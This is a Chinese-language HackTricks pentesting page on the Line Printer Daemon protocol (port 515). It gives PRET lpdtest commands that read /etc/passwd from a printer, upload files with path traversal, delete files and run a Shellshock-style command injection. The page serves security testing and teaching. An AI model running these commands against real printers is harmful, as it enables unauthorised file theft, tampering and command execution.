hacktricks/network-services-pentesting/515-pentesting-line-printer-daemon-lpd.md

从零开始学习AWS黑客技术，成为专家 htARTE（HackTricks AWS红队专家）！

支持HackTricks的其他方式：

• 如果您想看到您的公司在HackTricks中做广告或下载PDF格式的HackTricks，请查看订阅计划!
• 获取官方PEASS & HackTricks周边产品
• 探索PEASS家族，我们的独家NFTs
• 加入 💬 Discord群 或 电报群 或在Twitter上关注我们 🐦 @carlospolopm。
• 通过向HackTricks和HackTricks Cloud github仓库提交PR来分享您的黑客技巧。

LPD协议简介

在20世纪80年代，Line Printer Daemon (LPD)协议在伯克利Unix中开发，后来通过RFC1179正式规范化。该协议通过端口515/tcp运行，允许通过lpr命令进行交互。通过LPD打印的本质涉及发送一个控制文件（用于指定作业详细信息和用户）以及一个数据文件（保存打印信息）。虽然控制文件允许选择各种文件格式用于数据文件，但这些文件的处理取决于特定的LPD实现。Unix-like系统中一个广泛认可的实现是LPRng。值得注意的是，LPD协议可以被利用来执行恶意PostScript或PJL打印作业。

与LPD打印机交互的工具

PRET引入了两个基本工具，lpdprint和lpdtest，提供了一种与兼容LPD的打印机进行交互的简单方法。这些工具使得从打印数据到操作打印机上的文件（如下载、上传或删除）等一系列操作成为可能。

# To print a file to an LPD printer
lpdprint.py hostname filename
# To get a file from the printer
lpdtest.py hostname get /etc/passwd
# To upload a file to the printer
lpdtest.py hostname put ../../etc/passwd
# To remove a file from the printer
lpdtest.py hostname rm /some/file/on/printer
# To execute a command injection on the printer
lpdtest.py hostname in '() {:;}; ping -c1 1.2.3.4'
# To send a mail through the printer
lpdtest.py hostname mail lpdtest@mailhost.local

Shodan

• 端口 515

从零开始学习AWS黑客技术，成为专家 htARTE (HackTricks AWS Red Team Expert)！

支持HackTricks的其他方式：

• 如果您想在HackTricks中看到您的公司广告或下载PDF格式的HackTricks，请查看订阅计划!
• 获取官方PEASS & HackTricks周边产品
• 探索我们的独家NFTs收藏品The PEASS Family
• 加入 💬 Discord群 或 电报群 或 关注我们的 Twitter 🐦 @carlospolopm.
• 通过向HackTricks和HackTricks Cloud github仓库提交PR来分享您的黑客技巧。